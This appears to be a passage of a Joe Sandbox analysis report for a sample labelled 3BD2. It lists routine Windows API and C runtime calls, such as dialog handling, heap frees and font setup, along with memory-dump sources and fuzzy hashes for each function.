                                                                                                                                                                        • Part of subcall function 004098D4: SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 0040991D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$BrowseFocusFolderFromListMallocMessagePathSend
                                                                                                                                                                      • String ID: A$h1^
                                                                                                                                                                      • API String ID: 3792050300-2158714708
                                                                                                                                                                      • Opcode ID: 3ac560d3c3a2c6e9f03c12de2844331a339a07a0b2ced8771a02484cdb7565b1
                                                                                                                                                                      • Instruction ID: 467c90d1c75ca007e644d91c95b7550ff83e1c3269d6f79faabfbf85e50a53db
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ac560d3c3a2c6e9f03c12de2844331a339a07a0b2ced8771a02484cdb7565b1
                                                                                                                                                                      • Instruction Fuzzy Hash: 39115175A012189BCB20EB60C949BDF77BCEF44704F1400AAE805E7280DB38EE04CBA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0041BECD,00000002,?,0041BE95,00000003,0041BAE9), ref: 0041BF3C
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041BF4F
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0041BECD,00000002,?,0041BE95,00000003,0041BAE9), ref: 0041BF72
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 952d291bc156f6494ce42bc1d1788f1a3adad5fd56cf531d723b7027db991a24
                                                                                                                                                                      • Instruction ID: 1e418772a80086fb884ef9b4a034b25ecfa93c7407815c6c5127c544accdbe95
                                                                                                                                                                      • Opcode Fuzzy Hash: 952d291bc156f6494ce42bc1d1788f1a3adad5fd56cf531d723b7027db991a24
                                                                                                                                                                      • Instruction Fuzzy Hash: 99F04930705118BBCB159B91DC05BDEBF75DF08711F4141AAFC0592251DB355D51CE98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(uxtheme,?,00408B3D,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 0040847B
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0040848C
                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 004084AF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressLibraryLoadProcWindow
                                                                                                                                                                      • String ID: SetWindowTheme$uxtheme
                                                                                                                                                                      • API String ID: 1082215438-1369271589
                                                                                                                                                                      • Opcode ID: fcb52b72e6c6ca9fc2cd9b0e1b2dd305b5ff4cd18c8cb8358a5bd084cdec5453
                                                                                                                                                                      • Instruction ID: 7e06f69cc99b9bac6cf0ecef2d71764b36ae863c373c99b884c06f538ab59e4a
                                                                                                                                                                      • Opcode Fuzzy Hash: fcb52b72e6c6ca9fc2cd9b0e1b2dd305b5ff4cd18c8cb8358a5bd084cdec5453
                                                                                                                                                                      • Instruction Fuzzy Hash: 6AE09231740B22A2C23263207C0DF0B2A189BC1B20797807BFD45B62C1EF7DCC0295AC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                      • Opcode ID: 33e72a6a7b28e79f964b3acbf4f4363facca18292bcf9f2b0fb890cf43c66209
                                                                                                                                                                      • Instruction ID: 17134beeeaa8ba1a1679d093b622787bd2eab7e7e586602241a20cafa0314ffd
                                                                                                                                                                      • Opcode Fuzzy Hash: 33e72a6a7b28e79f964b3acbf4f4363facca18292bcf9f2b0fb890cf43c66209
                                                                                                                                                                      • Instruction Fuzzy Hash: 9241D172A40204AFCB14DF78CCC0AAEB7A5EF89314B15456EE555EB381DB34AD42CB88
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0041F942
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041F965
                                                                                                                                                                        • Part of subcall function 0041E08C: RtlAllocateHeap.NTDLL(00000000,?,?,?,004199EC,?,?,00411598,00000008,?,00407D46,?,00401253,?,0040126C), ref: 0041E0BE
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041F98B
                                                                                                                                                                      • _free.LIBCMT ref: 0041F99E
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F9AD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                      • Opcode ID: e3a55fc955836d28caceb77e82f462a19e9b1a77942fb49b0e204274c7dea3e4
                                                                                                                                                                      • Instruction ID: 67c4b6b84514e99d7ed1b2e50599fd221e740c6fed735a9971e407e67e25ce7e
                                                                                                                                                                      • Opcode Fuzzy Hash: e3a55fc955836d28caceb77e82f462a19e9b1a77942fb49b0e204274c7dea3e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 9801D8F26212157F23316A675C8CEBB7A6CEAC2BA0355013AFD05C3204DA688D4781B9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,0041D0A8,0041E0CF,?,?,004199EC,?,?,00411598,00000008,?,00407D46,?,00401253), ref: 0041D686
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0041D0A8,0041E0CF,?,?,004199EC,?,?,00411598,00000008,?,00407D46), ref: 0041D6AC
                                                                                                                                                                      • _free.LIBCMT ref: 0041D6EC
                                                                                                                                                                      • _free.LIBCMT ref: 0041D71F
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,0040126C,?,00401867), ref: 0041D72C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                      • Opcode ID: 78e8a0f401660786f7eac7a5c75f87cbec7cbd70719f0fb19cebfcb2ef30057f
                                                                                                                                                                      • Instruction ID: 60199272820e6a96305484e5efda92394ecbf077cc761fb21a0c0e98c2c4bae3
                                                                                                                                                                      • Opcode Fuzzy Hash: 78e8a0f401660786f7eac7a5c75f87cbec7cbd70719f0fb19cebfcb2ef30057f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A110CF2E00500769B15773ABC55EEB23699BC1375B25073BF43C922E9DE6D8C92402D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,0041B117,00000000,00000002,hC@,0041AA53,hC@,00000000,00000001,00426DC8,?,0000000A,00000001), ref: 0041D537
                                                                                                                                                                      • _free.LIBCMT ref: 0041D58E
                                                                                                                                                                      • _free.LIBCMT ref: 0041D5C2
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000000,00000006,000000FF,?,0000000A,00000001,?,?,00404368), ref: 0041D5CF
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000006,000000FF,?,0000000A,00000001,?,?,00404368), ref: 0041D5DB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                      • Opcode ID: 6c8578ce3fbbd7d3a99de486a532e7c8fc4b525b1d6abb9d834f5cfcadff1bdc
                                                                                                                                                                      • Instruction ID: 1e1afe3578860cedb134a91af1cb7bcdfed91ee82688196ddf334bde7902b2dc
                                                                                                                                                                      • Opcode Fuzzy Hash: 6c8578ce3fbbd7d3a99de486a532e7c8fc4b525b1d6abb9d834f5cfcadff1bdc
                                                                                                                                                                      • Instruction Fuzzy Hash: BD11C6F1D0090076DA1A373A7C06EFB236A9BC1329F20072BF435922E9DE2D8982412D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00420497
                                                                                                                                                                        • Part of subcall function 0041D99A: HeapFree.KERNEL32(00000000,00000000,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?), ref: 0041D9B0
                                                                                                                                                                        • Part of subcall function 0041D99A: GetLastError.KERNEL32(?,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?,?), ref: 0041D9C2
                                                                                                                                                                      • _free.LIBCMT ref: 004204A9
                                                                                                                                                                      • _free.LIBCMT ref: 004204BB
                                                                                                                                                                      • _free.LIBCMT ref: 004204CD
                                                                                                                                                                      • _free.LIBCMT ref: 004204DF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 81a4994557c7d6480d84085b145d34b0bfaf80dfde955fa9f37b50cf8be9d044
                                                                                                                                                                      • Instruction ID: 0b34afc1d5ba109aa7ca4b024fdf7cc946abab10d0a4c213946bde6ee899b357
                                                                                                                                                                      • Opcode Fuzzy Hash: 81a4994557c7d6480d84085b145d34b0bfaf80dfde955fa9f37b50cf8be9d044
                                                                                                                                                                      • Instruction Fuzzy Hash: E3F018B2614310A78A28EF55F595D5B73D9FA007147A4A91BF14CD7615CB3CFCC0865C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B6), ref: 004098E8
                                                                                                                                                                      • SetFocus.USER32(00000000,?,00000000,?,00407E57,?), ref: 004098EB
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B6), ref: 004098FB
                                                                                                                                                                        • Part of subcall function 00409AD9: SetWindowTextW.USER32(?,00000000), ref: 00409AE2
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B6), ref: 00409913
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 0040991D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$FocusMessageSendTextWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3590784419-0
                                                                                                                                                                      • Opcode ID: ea5c0620600fc7c1174c2fa7a200e380fc0049515997d48af839f303dcba3bbf
                                                                                                                                                                      • Instruction ID: b09454879a9156bf9965e39b5f910d728db494e00346013c1d48044c2a68c5d8
                                                                                                                                                                      • Opcode Fuzzy Hash: ea5c0620600fc7c1174c2fa7a200e380fc0049515997d48af839f303dcba3bbf
                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE03071701210BBCB206BA2AC49D877E1DEF8936174A8075FA0996162C7758C00DB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,?,?,00000001,?,?,00000001,?), ref: 0042064C
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000001,?,?,?,?,00000001,?,?,00000001,?), ref: 004206C1
                                                                                                                                                                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,?,00000001,?,?,00000001,?), ref: 004206D3
                                                                                                                                                                      • __freea.LIBCMT ref: 004206DC
                                                                                                                                                                        • Part of subcall function 0041E08C: RtlAllocateHeap.NTDLL(00000000,?,?,?,004199EC,?,?,00411598,00000008,?,00407D46,?,00401253,?,0040126C), ref: 0041E0BE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                      • Opcode ID: f8743e576bc107c6609c3ed1216d554a664f25be830c4081e4adab8b14cece5a
                                                                                                                                                                      • Instruction ID: e9a350ac2ca01777ac09b4f502c5a26bc6c9af9307c73b7b10c86fe152ab2255
                                                                                                                                                                      • Opcode Fuzzy Hash: f8743e576bc107c6609c3ed1216d554a664f25be830c4081e4adab8b14cece5a
                                                                                                                                                                      • Instruction Fuzzy Hash: EA31B471A0022AAFDB209F65EC44DEF7BB9EF84310F45452AFC0497252D7398D61CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00408528: GetDlgItem.USER32(?,?), ref: 00408534
                                                                                                                                                                        • Part of subcall function 00409DFA: GetDlgItem.USER32(?,?), ref: 00409E09
                                                                                                                                                                        • Part of subcall function 00409DFA: ShowWindow.USER32(00000000,?,?,00408B2D,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409E21
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408E2F
                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408E4B
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B7), ref: 00408E5E
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000FC,Function_00007E84), ref: 00408E6C
                                                                                                                                                                        • Part of subcall function 0040885E: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408881
                                                                                                                                                                        • Part of subcall function 0040885E: LoadIconW.USER32(00000000), ref: 00408888
                                                                                                                                                                        • Part of subcall function 0040885E: GetSystemMetrics.USER32(00000032), ref: 0040889A
                                                                                                                                                                        • Part of subcall function 0040885E: GetSystemMetrics.USER32(00000031), ref: 0040889F
                                                                                                                                                                        • Part of subcall function 0040885E: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004088A8
                                                                                                                                                                        • Part of subcall function 0040885E: LoadImageW.USER32(00000000), ref: 004088AF
                                                                                                                                                                        • Part of subcall function 0040885E: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004088CD
                                                                                                                                                                        • Part of subcall function 0040885E: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004088DA
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 004088F6
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 00408902
                                                                                                                                                                        • Part of subcall function 0040885E: GetWindowLongW.USER32(00000000,000000F0), ref: 00408909
                                                                                                                                                                        • Part of subcall function 0040885E: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040891E
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B5), ref: 0040892B
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B5), ref: 0040893B
                                                                                                                                                                        • Part of subcall function 0040885E: GetWindowLongW.USER32(00000000,000000F0), ref: 00408946
                                                                                                                                                                        • Part of subcall function 0040885E: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408955
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 0040896B
                                                                                                                                                                        • Part of subcall function 004098D4: GetDlgItem.USER32(?,000004B6), ref: 004098E8
                                                                                                                                                                        • Part of subcall function 004098D4: SetFocus.USER32(00000000,?,00000000,?,00407E57,?), ref: 004098EB
                                                                                                                                                                        • Part of subcall function 004098D4: GetDlgItem.USER32(?,000004B6), ref: 004098FB
                                                                                                                                                                        • Part of subcall function 004098D4: GetDlgItem.USER32(?,000004B6), ref: 00409913
                                                                                                                                                                        • Part of subcall function 004098D4: SendMessageW.USER32(00000000,000000B1,0000002D,0000002D), ref: 0040991D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2966018739-0
                                                                                                                                                                      • Opcode ID: e23b42092e34b1a96974f2fc2982f401f3c2b80cd7f40bf49976270d683c57db
                                                                                                                                                                      • Instruction ID: cba43c7cb726381ab6199fa7b18c1b0d7a1293c5f3324d0a1d8f45c7df7ef1ad
                                                                                                                                                                      • Opcode Fuzzy Hash: e23b42092e34b1a96974f2fc2982f401f3c2b80cd7f40bf49976270d683c57db
                                                                                                                                                                      • Instruction Fuzzy Hash: CA1184B2A00214ABDB10ABA5DC49F9EB7ADAF45314F4444B6BA05E32C1DA78DD008794
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3dd9033269c76c64176d7caa715b901faf46b904c1f5dd3c28fda8c014673bad
                                                                                                                                                                      • Instruction ID: 06c532f0e856b08cbec22241b2280dff1d786aa1756c7f0a263b5bfaf1c3592e
                                                                                                                                                                      • Opcode Fuzzy Hash: 3dd9033269c76c64176d7caa715b901faf46b904c1f5dd3c28fda8c014673bad
                                                                                                                                                                      • Instruction Fuzzy Hash: 3401F7F26492253EE7201A787CC0FA7620DDB403B8B30032BF422912D5DB289DD1416D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004082AE
                                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 004082D4
                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 004082E4
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00408310
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1900162674-0
                                                                                                                                                                      • Opcode ID: cacc2c15a5b800ec735e81840f7e04abea510644378271f59646a7a4fc92373e
                                                                                                                                                                      • Instruction ID: 75b9f5321dd968b731a610c5fb1de8e500b9923bf5aa4959ce782eacfd9f6304
                                                                                                                                                                      • Opcode Fuzzy Hash: cacc2c15a5b800ec735e81840f7e04abea510644378271f59646a7a4fc92373e
